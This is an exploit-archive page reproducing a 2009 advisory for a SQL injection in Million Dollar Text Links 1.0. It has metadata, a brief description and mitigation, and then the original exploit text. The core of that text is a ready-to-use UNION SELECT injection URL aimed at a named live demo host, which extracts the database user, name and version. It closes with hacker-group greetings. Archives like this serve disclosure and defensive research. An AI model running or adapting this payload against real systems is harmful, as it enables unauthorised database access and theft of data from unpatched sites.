Million Dollar Text Links - exploit.company

vendor:

Million Dollar Text Links

by:

Qabandi

7,5

CVSS

HIGH

SQL injection

CWE

Product Name: Million Dollar Text Links

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:cmsnx:million_dollar_text_links

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Million Dollar Text Links <= 1.0 SQL injection

A SQL injection vulnerability exists in Million Dollar Text Links <= 1.0. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries to view, add, modify and delete records in the back-end database. This may aid in further attacks.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

                  ||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_w_,
          ( :   /    (_)    /           (   .  


=By: 	Qabandi
=Email:	iqa[a]hotmail.fr

	From Kuwait PEACE

=Vuln:		Million Dollar Text Links <= 1.0 SQL injection
=INFO:		http://www.cmsnx.com/product.demo.php?id=12
=BUY:  		http://www.cmsnx.com/product.purchase.php?id=12
=DORK:		----


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

LIVE DEMO:
http://www.kalptarudemos.com/demo/million/admin.link.modify.php?id=-6%20UNION%20SELECT%201,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9--

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-=-=-==-Cookies<3==-=-==-=luv-=-them-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No-More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.

# milw0rm.com [2009-05-29]